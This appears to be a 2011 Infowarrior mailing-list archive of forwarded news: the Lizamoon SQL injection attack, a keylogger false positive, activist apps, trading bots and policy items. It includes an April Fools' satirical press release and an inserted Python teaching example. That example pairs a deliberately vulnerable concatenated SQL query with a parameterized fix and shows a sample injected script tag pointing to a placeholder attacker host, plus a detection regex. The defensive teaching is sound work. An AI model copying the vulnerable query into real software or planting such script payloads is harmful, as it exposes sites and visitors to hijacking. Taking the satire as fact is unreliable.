From rforno at infowarrior.org Fri Apr 1 06:41:15 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 1 Apr 2011 07:41:15 -0400
Subject: [Infowarrior] - WH Announces the Partnership for Excellence in American Cybersecurity
Message-ID: <37DE7315-4FCB-4D57-89B1-92B305BEBF1E@infowarrior.org>

Finally, some fresh thinking on the matter.... I could very easily stand behind this effort.

--- rick

http://www.whitehouse.gov/the-press-office/2011/04/01/press-release-national-cybersecurity-excellence-partnership

THE WHITE HOUSE
Office of the Vice President
____________________________________________________________________________
For Immediate Release
April 1, 2011

White House Announces the Partnership for Excellence in American Cybersecurity

Washington, DC - Vice President Joe Biden announced today that President Obama has established the National Partnership for Excellence in American Cybersecurity to help address America’s growing cybersecurity concerns.

"The Federal government has the responsibility to protect and defend the country, and all levels of government have the responsibility to ensure the safety and well-being of their citizens. The private sector, however, designs, builds, owns, and operates most of the network infrastructures that support government and private users alike. Industry and governments share the responsibility for the security and reliability of the infrastructure and the transactions that take place on it and should work closely together to address these interdependencies," said the Vice President.

The Partnership will consist of representatives from companies that provide information technology products, services, and consumer electronics, small businesses, non-profit organizations, and academia along with consultative participation from selected federal agencies including the Departments of Commerce and Homeland Security.
The goal of the Partnership is to develop actionable recommendations, based on new thinking, fresh ideas, and research suggestions, that can help government and the private sector better protect their critical information resources. The Chairman for the Partnership will be named at a future date.

In prepared remarks, President Obama acknowledged that "we are quite convinced that our vulnerabilities are increasing steadily while the costs associated with an effective attack continue to drop. What is more, the investments required to improve the situation are still relatively modest, but will rise if we procrastinate. We should attend to our critical foundations before the storm arrives, not after: Waiting for disaster will prove as expensive as it is irresponsible."

Quoting the 2009 White House Cybersecurity Policy Review, the President added that "it is the fundamental responsibility of our government to address strategic vulnerabilities in cyberspace and ensure that the United States and the world realize the full potential of the information technology revolution. The Nation’s approach to cybersecurity over the past 15 years has failed to keep pace with the threat."

The Administration and Commission realize that due to the limited amount of federal funding available during this period of national stringency it is not practical to rediscover and report on the challenges facing American cybersecurity. Therefore, since the situation remains fairly the same as it was at the time, the Partnership will re-release the 1997 Presidential Commission on Critical Infrastructure Protection (PCCIP) report with a new logo, modern typeface, and updated list of involved organizations.
The federal funds saved by not rediscovering these previously published findings and frequently repeated recommendations will be used instead by the Partnership to convene a series of town hall meetings in late 2011 that will bring together cybersecurity professionals, researchers, and pundits to reflect on exactly how successful the Nation has been in effectively addressing these oft-cited concerns pertaining to the American homeland.

Contact: April Fueul (202) 456-1414 or april.fueul at eop3.whitehouse.gov.

From rforno at infowarrior.org Fri Apr 1 07:02:25 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 1 Apr 2011 08:02:25 -0400
Subject: [Infowarrior] - Stone & Parker tell how MPAA screws indie producers
Message-ID:

TorrentFreak points us to a perfect example of this in a short snippet of South Park's Matt Stone and Trey Parker talking about how the MPAA screwed them over when they were indie filmmakers when it came to ratings, but when they were working with a major studio, things were entirely different:

< -- >

http://www.techdirt.com/articles/20110322/04313013586/how-mpaa-screws-over-indie-filmmakers.shtml

From rforno at infowarrior.org Fri Apr 1 07:27:06 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 1 Apr 2011 08:27:06 -0400
Subject: [Infowarrior] - Round-up of Fed Data Dump (via Bloomberg)
Message-ID: <0572015D-9F4A-4FC2-9765-86A5A782E8B1@infowarrior.org>

(Translation: Never believe anything a bank says when they're in trouble. Like, obviously. --- rick)

Bloomberg News is flooding the zone on the Fed’s discount-window document dump, which the central bank had to disclose after Bloomberg sued it and won.
Here are a few of its stories so far:

< -- >

http://www.cjr.org/the_audit/audit_notes_bloomberg_on_the_f_1.php

From rforno at infowarrior.org Fri Apr 1 09:15:54 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 1 Apr 2011 10:15:54 -0400
Subject: [Infowarrior] - Report: The Rise of the “Second Internet” and What It Means
Message-ID: <3B2645CE-200C-40E4-8E9C-654AB179995A@infowarrior.org>

The Rise of the “Second Internet” and What It Means

What is the thread that ties together the rapid rise of companies as different as Facebook, Zynga, Twitter, The Huffington Post and Quora? Wedbush Securities, a brokerage firm that analyzes the valuations of private companies, says they are all players in what it calls the “Second Internet.”

Wedbush says there are certain attributes that allow such players to grow and thrive while more traditional players — including some of the leaders from the early days of the Internet — fail to prosper and gradually recede into history. The most important of these attributes, the firm says, is an understanding of the value of the social web.

The social nature of this new wave of Internet companies is such a major factor that Wedbush also calls it the rise of the “Social Internet” in a new report on the sector, and says successful companies are powered by similar features, including:

• Platforms open up their API to developers
• Continuous and rapid pace of innovation (see Facebook)
• The company/brand must listen to the dialogue and participate with customers
• Customer contribution is a large percent of the value/experience
• Every customer has a personalized experience
• Social graph connections drive discovery rather than search

The report looks at the value of Facebook — comparing the growth of the company to the growth of Google — as well as the rise of other key players such as Quora, The Huffington Post and Zynga, and how each of them effectively took over from a leader of what it calls the “First Internet.”

< -- >

http://gigaom.com/2011/03/31/the-rise-of-the-second-internet-and-what-it-means/

From rforno at infowarrior.org Fri Apr 1 09:30:40 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 1 Apr 2011 10:30:40 -0400
Subject: [Infowarrior] - BBC: Sites hit in massive web attack
Message-ID:

http://www.bbc.co.uk/news/technology-12933053

1 April 2011 Last updated at 05:34 ET

Sites hit in massive web attack

Hundreds of thousands of websites appear to have been compromised by a massive cyber attack.

The hi-tech criminals used a well-known attack vector that exploits security loopholes on other sites to insert a link to their website.

Those visiting the criminals' webpage were told that their machines were infected with many different viruses.

Swift action by security researchers has managed to get the sites offering the sham software shut down.

Code control

Security firm Websense has been tracking the attack since it started on 29 March. The initial count of compromised sites was 28,000 sites but this has grown to encompass many times this number as the attack has rolled on.

Websense dubbed it the Lizamoon attack because that was the name of the first domain to which victims were re-directed. The fake software is called the Windows Stability Center.

The re-directions were carried out by what is known as an SQL injection attack. This succeeded because many servers keeping websites running do not filter the text being sent to them.

By formatting the text correctly it is possible to hide an instruction in it that is then injected into the databases these servers are running. In this case the injection meant a particular domain appeared as a re-direction link on webpages served up to visitors.
Reports suggest that the attackers are hitting sites using Microsoft SQL Server 2003 and 2005 and it is thought that a weakness in associated web software is proving vulnerable.

Ongoing analysis of the attack reveals that the attackers managed to inject code to display links to 21 separate domains. The exact numbers of sites hit by the attack is hard to judge but a Google search for the attackers' domains shows more than three million weblinks are displaying them.

Security experts say it is the most successful SQL injection attack ever seen. Generally, the sites being hit are small businesses, community groups, sports teams and many other mid-tier organisations.

Currently the re-directs are not working because the sites peddling the bogus software have been shut down.

Also hit were some web links connected with Apple's iTunes service. However, wrote Websense security researcher Patrick Runald on the firm's blog, this did not mean people were being redirected to the bogus software sites.

"The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer," he wrote.

From rforno at infowarrior.org Fri Apr 1 13:01:23 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Fri, 1 Apr 2011 14:01:23 -0400
Subject: [Infowarrior] - more on: Samsung Keylogger = False Positive
References:
Message-ID: <0FEC167E-1904-484E-8AB1-1875866892F5@infowarrior.org>

Begin forwarded message:

> From: "E. Balansay"
>
> Have you received links regarding the Samsung Keylogger was a false positive:
>
> http://gizmodo.com/#!5787655/samsung-laptop-keylogger-was-a-false-positive
>
> Which links to:
>
> http://sunbeltblog.blogspot.com/2011/03/samsung-laptops-do-not-have-keylogger.html
>
> I believe this is the original Network World link:
> http://www.networkworld.com/newsletters/sec/2011/032811sec2.html
>
> Interesting stuff!
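The two mechanisms in the BBC item above (request text pasted unfiltered into a database query, and the output encoding that kept iTunes' pages from running the injected script) side by side, as an added example that is not part of any forwarded article. It uses SQLite as a stand-in for the SQL Server back ends mentioned, constructed product rows, and a placeholder attacker domain; the tainted row shows what a defender would sweep stored content for after a campaign like this one.

```python
import html
import re
import sqlite3

# Constructed sample rows (not real site content or real indicators). The
# second row has been tainted the way the mass-injection campaign did: an
# external script tag appended to a text field, here pointing at a placeholder.
SAMPLE_PRODUCTS = [
    ("Widget", "A plain widget."),
    ("Gadget", 'A gadget</title><script src="http://attacker-domain.example/redirect.js"></script>'),
]

# Matches a script tag whose src points at an external URL inside stored text.
INJECTED_SCRIPT = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.IGNORECASE
)


def build_db():
    """In-memory SQLite store seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, descr TEXT)")
    conn.executemany("INSERT INTO products (name, descr) VALUES (?, ?)", SAMPLE_PRODUCTS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    """The pattern the article describes: request text pasted straight into SQL.
    A quote in `name` closes the string literal and the remainder is parsed as
    SQL, which is exactly what lets an injected instruction reach the database."""
    sql = "SELECT descr FROM products WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def quote_breaks_vulnerable_lookup(conn, name="O'Brien"):
    """True if an ordinary apostrophe already changes the shape of the query."""
    try:
        lookup_vulnerable(conn, name)
    except sqlite3.OperationalError:
        return True
    return False


def lookup_safe(conn, name):
    """Parameterized statement: the driver binds `name` as data, so no
    characters in it can alter the statement the database executes."""
    sql = "SELECT descr FROM products WHERE name = ?"
    return [row[0] for row in conn.execute(sql, (name,))]


def render(descr):
    """Output encoding, the control Websense credited iTunes with: a stored
    <script> tag is emitted as entities, so the browser shows it as text."""
    return html.escape(descr, quote=True)


def find_injected_rows(conn):
    """Defender-side sweep: rows whose text carries an external script tag,
    returned as (row id, script URL) pairs for triage."""
    hits = []
    for row_id, descr in conn.execute("SELECT id, descr FROM products"):
        for match in INJECTED_SCRIPT.finditer(descr):
            hits.append((row_id, match.group(1)))
    return hits


if __name__ == "__main__":
    db = build_db()
    print("safe lookup:", lookup_safe(db, "Widget"))
    print("apostrophe breaks concatenated query:", quote_breaks_vulnerable_lookup(db))
    print("tainted rows:", find_injected_rows(db))
    print("encoded for output:", render(SAMPLE_PRODUCTS[1][1]))
```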
From rforno at infowarrior.org Sat Apr 2 16:01:58 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sat, 2 Apr 2011 17:01:58 -0400
Subject: [Infowarrior] - State Department Builds A Panic Button App
Message-ID: <611EB5E3-4278-4808-9D39-3AF8B0B3DF74@infowarrior.org>

State Department Builds A Panic Button App
Jon Orlin
http://techcrunch.com/2011/04/02/state-department-builds-a-panic-button-app

Imagine you are a pro-democracy protester on the streets of a repressive government. You’ve got your cellphone and you are messaging your friends. In the crowd near you, the police start making arrests. Fearing the government will confiscate your phone and investigate your contacts, you push a “panic button” on your phone. It deletes the contacts in your address book and sends out an alert.

Such an app wasn’t readily available so the U.S. State Department, acting as a venture capitalist, decided to build one.

The State Department tells TechCrunch government funded work is underway to build an Android version of this “panic button” app. No release date has been set. Another version designed to work on low-cost Nokia phones, more common in the developing world, is being considered. No iPhone app is planned for now.

The special app, first reported by Reuters, is part of an initiative to promote new technologies for social activists. So far, the State Department has funded $22 million in “Internet freedom programming.” The money goes to innovators in the form of small grants ranging from a few to tens of thousands of dollars. TechCrunch asked who was getting the money, but due to the sensitive nature of the project, the government won’t disclose names. An open, competitive bid process was used to award the grants.

While the government isn’t looking for more help building these apps, they may have future projects designed to advance “Internet Freedom” in other ways. Keep an eye on www.grants.gov for any additional info.
Some of the past program objectives have included developing technology “to enable users in closed societies to get around firewalls and filters in acutely hostile Internet environments” and training bloggers and activists to safely and anonymously participate in online forums.

The effort is another example of how the administration sees the important role social media and technology has played in global politics. In 2009, the U.S. asked Twitter to delay maintenance work so real-time information about the Iranian protests could continue. The White House has also called on Egypt and Libya to restore internet blackouts.

The State Department says it’s not just writing checks. The government is trying to use venture capitalist techniques to produce the best results. No, the goal is not to make 10x on the investment. But, the government is supporting a diverse portfolio of innovation rather than just funding big established technologies. It’s providing knowledge and connections, not just cash. And they are investing to incubate a new community focussed on the intersection of technology and human rights.

Of course with any well intentioned program, there could be negative side effects. What happens if the panic button app gets into the wrong hands, such as drug dealers or terrorists? A State Department spokesperson tells TechCrunch it’s a legitimate concern and they are taking that into account when planning the distribution and publicity of the app. It seems TechCrunch readers won’t be a problem.
From rforno at infowarrior.org Sun Apr 3 08:27:46 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 3 Apr 2011 09:27:46 -0400
Subject: [Infowarrior] - Robots Rattle Data Guru
Message-ID: <399BCD7E-F1A6-4410-82B9-BFB4B8506C99@infowarrior.org>

http://online.barrons.com/article/SB50001424052970203560404576228920925930788.html

SATURDAY, APRIL 2, 2011

Robots Rattle Data Guru
By JIM MCTAGUE

A savvy market watcher has detected some suspicious -- and very, very fast -- automated-trading activity in March.

Flash Crash 2? New robotic-trading strategies are attempting to hack futures and equities markets -- again. The suspicious activity appears unconnected to the October cyberattack on Nasdaq OMX Group (ticker: NDAQ) now being investigated by the National Security Agency. But there seems to be a new team of trading 'bots abroad -- and yes, they're distorting prices.

The suspect algorithms first appeared March 2, Eric Hunsader, founder of Nanex, a Winnetka, Ill., data firm, tells Barron's. When rapid-fire automated-trading systems torched the indexes in the infamous May 6, 2010, "flash crash," Hunsader was the first to notice that the Consolidated Quote System (CQS) was running 35 seconds late.

Hunsader's Nanex delivers trade data from multiple markets over the Internet to retail and institutional clients. When the New York Stock Exchange discovered gaps in its trading data for May 7, 2010, it purchased Nanex data from a third-party vendor to fill in the blanks. The data are sold to institutions for back-testing.

Automated systems are programmed by mathematicians whose ultra-short-term strategies have radically altered markets. And while there have been flash-crash fixes, they haven't stopped the new invaders, which are orders of magnitude faster.

Hunsader theorizes that one new algorithm appears to be trading E-mini S&P 500 Futures (they're a fraction the size of standard S&P futures contracts) at the Chicago Mercantile Exchange.
The algo alters the prices of related instruments, like the index-based SPDR S&P 500 (SPY) exchange-traded fund and underlying Standard & Poor's 500 stocks and options -- creating arbitrage opportunities; when it's active, the bid-ask spread on SPY as traded on Nasdaq's Philadelphia exchange sometimes widens from a penny to a dollar. The spreads on the SPY stay within a penny on other exchanges. And, says Hunsader, the algorithm instantly buys or sells enough E-mini contracts to trade through the top three levels of the electronically displayed order book in about 50 milliseconds. He detected the trading pattern on 18 days in March. The CME had no comment.

Another algorithm, says Hunsader, changes order sizes at the top of the order book in about 20 to 40 stocks on Nasdaq for a few milliseconds several times a day. Each stock is traded anywhere from 2,000 to 4,000 times a second, double to quadruple the norm. The activity floods the quote system with trade data, but so far seems to cause no harm.

On March 16, the CQS saw peak-volume traffic hit warp speed: a record 390,000 messages per second for all stock symbols between 11:01 a.m. and 11:02 a.m. (A year ago, such volume would have swamped the CQS, as peak capacity was 200,000 messages a second.) At 11:01:48 a.m. -- the peak of the weird trading -- 10.5% of the quotes on CQS were locked or crossed, meaning that the bid exceeded the offer. The next second, it was 13%. Usually, about 3% of trades are crossed.

Hunsader wonders why the exchanges are not saying that they are worried. This is all too similar to what happened during the 2010 flash crash, causing the delay that went unnoticed by regulators and market experts -- despite all their monitoring equipment. Meanwhile, CQS has been upgraded to handle 750,000 messages a second; by July, total capacity will be one million messages per second... What helps legit trading will also help fast hackers.
From rforno at infowarrior.org Sun Apr 3 17:56:10 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 3 Apr 2011 18:56:10 -0400
Subject: [Infowarrior] - Alzheimer’s Studies Show Genetic Links
Message-ID:

April 3, 2011

Alzheimer’s Studies Show Genetic Links
By GINA KOLATA
http://www.nytimes.com/2011/04/04/health/04alzheimer.html

The two largest studies of Alzheimer’s disease have led to the discovery of no fewer than five genes that provide intriguing new clues to why it strikes and how it progresses.

Researchers say the studies, which analyzed the genes of more than 50,000 people in the United States and Europe, leave little doubt that the five genes make the disease more likely in the elderly and have something important to reveal about the disease’s process. “The level of evidence is very, very strong,” said Dr. Michael Boehnke, a professor of biostatistics at the University of Michigan and an outside adviser on the research.

The two studies are being published Monday in the journal Nature Genetics.

By themselves, the new genes are not nearly as important a factor as APOE, a gene discovered in 1995 that greatly increases risk for the disease: by 400 percent if a person inherits a copy from one parent, by 1,000 percent if from both parents. In contrast, each of the new genes increases risk by no more than 10 to 15 percent; for that reason, they will not be used to decide if a person is likely to develop Alzheimer’s. APOE, which is involved in metabolizing cholesterol, “is in a class of its own,” said Dr. Rudolph Tanzi, a neurology professor at Harvard Medical School and an author of one of the papers.

But researchers say that for understanding the disease and developing new therapies, a slight increase in risk is more than sufficient. And like APOE, some of the newly discovered genes appear to be involved with cholesterol. Others are linked to inflammation or the transport of molecules inside cells.
For years, there have been unproven but persistent hints that cholesterol and inflammation are part of the disease process. People with high cholesterol are more likely to get the disease. Strokes and head injuries, which make Alzheimer’s more likely, also cause brain inflammation.

The new discoveries double the number of genes known to be involved in Alzheimer’s, to 10 from 5. One of the papers’ 155 authors, Dr. Richard Mayeux, chairman of neurology at Columbia University Medical Center, said the findings would “open up the field.”

And an expert who was not part of the studies, Dr. Nelson B. Freimer, who directs the U.C.L.A. Center for Neurobehavioral Genetics, said there were now enough unequivocal genes for Alzheimer’s disease that researchers could make real progress in figuring out its biology. “This is a big, solid step,” he said.

Of the 10 genes now associated with Alzheimer’s in old age, four were found in the past few years and are confirmed by the new studies. APOE may have other roles in the disease, perhaps involved in clearing the brain of chemicals that pile up in plaques, the barnacle-like particles that dot the brain of Alzheimer’s patients and are the one unique pathological feature of the disease.

It is known that one of the first signs of Alzheimer’s disease is an accumulation of amyloid beta, or a-beta, a protein that forms plaques. And it is known that later in the disease, twisted and tangled proteins known as tau appear in dead and dying nerve cells. But what is not known is why a-beta starts to accrue, why the brains of people with Alzheimer’s cannot get rid of its excess, or what is the link between amyloid and tau.

One of the new papers, by American investigators, analyzed the genes of 54,000 people, some with Alzheimer’s and others of the same age but without the disease. They found four new genes. The other paper is by researchers in Britain, France and other European countries with contributions from the United States.
They confirmed the genes found by the American researchers and added one more gene.

The American study got started about three years ago when Gerard D. Schellenberg, a pathology professor at the University of Pennsylvania, went to the National Institutes of Health with a complaint and a proposal. Individual research groups had been doing their own genome studies but not getting much because no one center had enough subjects.

In an interview, Dr. Schellenberg said he told Dr. Richard J. Hodes, director of the National Institute on Aging, that the small genomic studies had to stop, and Dr. Hodes agreed. These days, Dr. Hodes said, “the old model in which researchers jealously guarded their data is no longer applicable.”

So Dr. Schellenberg set out to gather all the data he could on Alzheimer’s patients and on healthy people of the same ages. The idea was to compare one million positions on each person’s genome to determine whether some genes were more common in those who had Alzheimer’s.

“I spent a lot of time being nice to people on the phone,” Dr. Schellenberg said. He got what he wanted: nearly every Alzheimer’s center and Alzheimer’s geneticist in the country cooperated.

Dr. Schellenberg and his colleagues used the mass of genetic data to do an analysis and find the genes and then, using two different populations, to confirm that the same genes were conferring risk in those groups. That helped assure the investigators that they were not looking at a chance association.

It was a huge effort, Dr. Mayeux said. Many medical centers had Alzheimer’s patients’ tissue sitting in freezers. They had to extract the DNA and do genome scans. “One of my jobs was to make sure the Alzheimer’s cases really were cases,” Dr. Mayeux said — “that they had used some reasonable criteria” for diagnosis. “And I had to be sure that people who were unaffected really were unaffected.”

But once the project got going, “we all realized we have to make this happen, it just had to happen,” he continued. “Everyone wanted to collaborate.”

Meanwhile, the European group, led by Dr. Julie Williams of the School of Medicine at Cardiff University, was engaged in a similar effort. Dr. Schellenberg said the two groups compared their results and were reassured that they were largely finding the same genes. “If there were mistakes, we wouldn’t see the same things,” he added.

Now the European and American groups are pooling their data to do an enormous study, looking for genes in the combined samples. “We are upping the sample size,” Dr. Schellenberg said. “We are pretty sure more stuff will pop out.”

From rforno at infowarrior.org Sun Apr 3 18:04:20 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Sun, 3 Apr 2011 19:04:20 -0400
Subject: [Infowarrior] - OMB prepares for open gov sites to go dark in May
Message-ID: <96F2F69C-67D1-4273-B56E-2E6ACFD662BA@infowarrior.org>

OMB prepares for open gov sites to go dark in May
March 31, 2011 - 2:46pm
By Jason Miller
Executive Editor
Federal News Radio
http://www.federalnewsradio.com/?nid=35&sid=2327798

Many of the Obama administration's top open government initiatives are set to be turned off by May 31.

Government sources confirm that the Office of Management and Budget is planning to take seven websites dark in two months because of a lack of funding.

One government official, who requested anonymity because they didn't get permission to discuss the topic, said funding will begin to run out on April 20 for public sites IT Dashboard, Data.gov and paymentaccuracy.gov. The source said OMB also is planning on shutting down internal government sites, including Performance.gov, FedSpace and many of the efforts related to the FEDRamp cloud computing cybersecurity effort.

The official said two other sites, USASpending.gov and Apps.gov/now, will run through July 30 but go dark soon after.

"We need at least another $4 million just to keep USASpending.gov operating this year," the official said.
"We are looking at a pass-the-hat approach, but it could be challenging to get that done in time."

The White House requested $35 million for the e-government fund in 2011. The House allocated only $2 million in its bill, H.R. 1. The Senate, meanwhile, would provide $20 million for the e-government fund.

"The continuing resolution says we can only spend what we would reasonably expect to get during the fiscal year, and we have no reasonable expectation to get more than a couple of millions of dollars," the source said.

OMB and the General Services Administration, which manages the e-gov fund, already spent $1.63 million last fall on the recipient reporting feature of USASpending.gov. OMB and GSA now can only spend $370,000 the rest of the year on these initiatives.

A request to OMB for comment on the sites going dark was not returned.

Proposed cuts to e-gov despite cost-savings

Federal Chief Information Officer Vivek Kundra said recently that the IT Dashboard has helped save the government $3 billion on IT projects.

"Using this important tool, we identified underperforming high priority IT projects and began an intensive review of these programs, eliminating ineffective projects, reconfiguring others, and targeting IT expenditures more carefully," he said in a video promoting the IT Dashboard's benefits.

The lack of House support for e-government also doesn't bode well for the administration's $50 million request for the Integrated, Efficient, and Effective Uses of Information Technology (IEEUIT) program. The Senate approved $40 million in its version of the 2011 spending bill. The House doesn't discuss this fund specifically.

Kundra said in a March 17 hearing before the House Appropriations Subcommittee on Financial Services and General Government that the IEEUIT fund is devoted to cracking down on duplicative systems and increasing the number of large scale IT projects they are reviewing.
Kundra announced Thursday that OMB is moving to an open source model for the IT Dashboard and for the TechStat toolkit. Kundra did not say if the budget was part of the reason for the move, only that he wants to tap into the collective ideas to improve both tools and other governments want to implement these processes.

"The detrimental effect of HR 1 on so many areas of government is clear — and perhaps no more so than on the efforts to ensure the government's IT infrastructure upgrades are proceeding on schedule and on budget," said Rep. Jose Serrano (D-N.Y.), ranking member of the House Appropriations Subcommittee on Financial Services and General Government. "We cannot have a more streamlined, efficient and open government without using the best technology available. Unfortunately the cuts in H.R. 1 to e-government fund will have the unintended consequence of making government less accountable and transparent."

Requests for comment to the chairman of the House Appropriations Committee were not returned.

Pro-transparency groups fight cuts

Several industry and good government groups have been trying to drum up support for these e-government initiatives.

The Sunlight Foundation sent a letter to House and Senate appropriators as well as each chamber's leadership explaining why these programs are so important.

"Basically what the letter says is this is the way to find out what's going on in Congress, this is the way to find out where tax dollars are going and this is the way to figure out what the government is doing," said Daniel Schuman, a policy counsel with Sunlight, during an interview on In Depth with Francis Rose Wednesday.

He said that if the sites go dark, the data will eventually go out of date and the efforts to clean up and make the information more useful also will stop.

"If it were to go away, agencies could perhaps post the information on their website," Schuman said.
"But because of the way government websites are set up, it could be difficult or impossible for people to access information they've already grown accustomed to using. A lot of people built programs to gather information from Data.gov, and they would have to go back and rework what they do."

The White House is reaching out to members on the Hill.

"It's been an annual challenge to get congressional support for the e-government fund," said Tim Young, a former OMB official and now a director with Deloitte Consulting. "One of the reasons that it's been challenging in getting the e-government fund fully appropriated is what some say is a void in the tangible political constituency. Some in Congress say it's a nice to have but an unnecessary fund."

He added that the benefits of the programs are realized across the government but because the money is not given to a specific program or agency, there are some who argue that dilutes the benefits of the programs.

Sen. Joseph Lieberman (I-Conn.), the author of the E-Government Act of 2003, which created the e-gov fund, has long been a steady supporter of Congress providing full funding.

"Economic conditions demand wise budget decisions, but cutting money from multiple federal IT programs is penny-wise and pound foolish," said Leslie Phillips, a spokeswoman for the Senate Homeland Security and Governmental Affairs Committee, which Lieberman is the chairman of. "Programs that modernize technology ultimately improve management and save taxpayers billions of dollars. Transparency and e-government programs encourage public participation in government. Small investments in IT modernization can reap enormous rewards, which is why Senator Lieberman opposes the proposed cuts to the e-gov fund and the administration's IT reform efforts."

Young said cutting the funding in the short term will cost the government in the long run.
"Inconsistency in funding has a potential negative impact especially if agencies are meeting fixed schedules or deployments," he said. "In many cases, changes to the schedule increase the government's costs."

Others say despite bipartisan support, it's still a matter of educating the appropriators about the benefits of these sites.

"Generally there have been many criticisms about the quality of data but at this stage of the effort, two years in, what's happening if you terminate these sites is the ability to improve the quality of information and information vendors are seeking will be completely eliminated," said Fred Corle, senior director for strategic marketing at KGS, Inc. "Clearly with the budget situation and election in November, there are pressures put upon Congress to balance the budget or at least move in that direction and that is a major driver. But there are certainly some merits to providing this kind of information."

Corle added the potential shutdown of the USASpending site would have a big impact on the government's transparency efforts as well as on vendors.

"There has been a lot of work in terms of data quality and pulling sites down at this stage of evolution would stunt it," he said.

Young said if the IT Dashboard goes dark it would have a significant impact on oversight of the $80 billion IT budget.

"It's a small investment, maybe $2 million or $3 million to help provide oversight of $80 billion," he said. "I'd expect in the mid-term that some of those oversight responsibilities will go away and a lack of accountability at the program level may ensue."

Budget constraints at odds with e-gov efforts

Dan Chenok, a former OMB official and now a senior fellow with IBM's Center for the Business of Government, said the administration remains committed to a transparency and open government agenda, but it's getting caught up in the budget constraints.
Chenok said if the funding gets cut there are several other ways OMB could ensure these sites are kept running.

"As for other options, I'm not sure what is being considered, but historically there have been other manners and methods to use funding to support activities," he said. "These include interagency transfers under the Economy Act, working capital funds, carry over support from multi-year funding for technology and additionally vehicles that could be used. The administration would have to work with Congress and other stakeholders to make them work."

Young said what OMB does should the sites go dark will be interesting.

"What would be telling if these cuts endure," he said. "Will OMB make an attempt to fund through alternative sources such as interagency funding through the CIO or CFO councils, or will agencies take ownership of certain programs until the funding can be restored?"

Schuman and others say a lot depends on what comes from the latest efforts to keep the government running past April 8. Budget discussions between the White House and Congress are advancing and could include $33 billion in reductions.

(Copyright 2011 by FederalNewsRadio.com. All Rights Reserved.)

From rforno at infowarrior.org Mon Apr 4 11:25:28 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 4 Apr 2011 12:25:28 -0400
Subject: [Infowarrior] - KSM to be tried by military commission at Gitmo
Message-ID: <6D7C7EEC-630E-40EF-A3DD-19DC462BCB12@infowarrior.org>

April 4, 2011 11:33 AM
KSM to be tried by military commission at Gitmo; Holder set to make announcement today
(Credit: AP)
Updated at 12:05 p.m. ET
http://www.cbsnews.com/8301-503544_162-20050405-503544.html?tag=contentMain;contentBody

Attorney General Eric Holder today will announce that self-proclaimed Sept. 11 mastermind Khalid Sheikh Mohammad will be tried in a military commission, CBS News has learned. A source says the commission will be held at the Guantanamo Bay prison.
Trying Mohammed in a civilian court and closing the Guantanamo prison were once some of the Obama administration's top priorities, but political realities have hamstrung both goals. In November 2009, Holder announced that Mohammed and four other alleged Sept. 11 plotters would be tried in New York City, but he scrapped that plan in the wake of public consternation. Republicans and some others in Washington said the decision compromised national security, while a CBS News poll at the time showed that most Americans thought such suspects should be tried in a closed military court.

Holder said on CBS' "Face the Nation" last July that he preferred trying the alleged terrorists in civilian court because the United States has an "extremely capable" court system that has proven effective in these kinds of cases. "I think there's a lot of misinformation out there. We have proven an ability to hold in our federal prison system people convicted of, charged with terrorist offenses very effectively, very safely," he said.

Congress in the past year has tried to undermine the administration's goal of closing Guantanamo by restricting funding for such policy changes. Meanwhile, the case of Ahmed Ghailani, the first Guantanamo detainee to be tried in civilian court, last year cracked open the debate over how to bring to justice detainees in the "war on terror." Ghailani was convicted of one conspiracy charge but acquitted of more than 280 other charges related to his role in the 1998 bombings of U.S. embassies in Africa.
From rforno at infowarrior.org Mon Apr 4 15:15:06 2011
From: rforno at infowarrior.org (Richard Forno)
Date: Mon, 4 Apr 2011 16:15:06 -0400
Subject: [Infowarrior] - "Big Content" Is Strangling American Innovation
Message-ID: <6A6F28F2-E7EC-4445-BFD0-8EB753592E76@infowarrior.org>

"Big Content" Is Strangling American Innovation
11:45 AM Thursday March 31, 2011
by James Allworth
http://blogs.hbr.org/cs/2011/03/big_content_is_strangling_amer.html

Innovation has emerged as a key means by which the US can pull itself out of this lackluster economy. In the State of the Union, President Obama referred to China and India as new threats to America's position as the world's leading innovator. But the threats are not just external. One of the greatest threats to the US's ability to innovate lies within: specifically, with the music and movie business. These Big Content businesses are attempting to protect themselves from change so aggressively that they risk damaging America's position as a world leader in innovation.

Many in the high technology industry have known this for a long time. Despite making their living relying on it, the Big Content players do not understand technology, and never have. Rather than see it as an opportunity to reach new audiences, technology has always been a threat to them. Example after example abounds of this attitude; whether it was the VCR which was "to the American film producer and the American public as the Boston strangler is to the woman home alone" as famed movie industry lobbyist Jack Valenti put it at a congressional hearing, or MP3 technology, which they tried to sue out of existence. In fact, it's possible to go back as far as the gramophone and see the content industries rail against new technology.

The reason why? Every shift in technology is difficult for them. Just as they work out how to make money using one technology, it changes. The sensible thing for them to do would be to learn how to deal with the change.
Instead, their approach to every generation of technology is either to attempt to stymie it so badly that nobody wants it, or to stop it altogether through their influence with lawmakers in Washington DC. Now, in the past, these efforts might have impacted technology that only involved the consumption of movies and music. But as the technology used to display movies and listen to music converges with other technology -- technology where America has historically led -- Big Content's attempts to protect their business model threaten innovation at the very heart of America's competitive advantage.

Let's take a look at one specific example: the industry's repeated attempts to introduce innovation-chilling legislation. The latest is COICA, designed to allow the Government to take down any website that infringes copyright -- and lock the domain. Fortunately, a number of American legislators have taken a more clear-headed view of the problem. It was defeated late last year in Congress, after being described by Senator Ron Wyden as a "bunker buster cluster bomb." But it's back again. In a recent interview, Silicon Valley Congressman Zoe Lofgren describes the back and forth with the content industry and their requests for legislation like COICA as increasingly draconian.

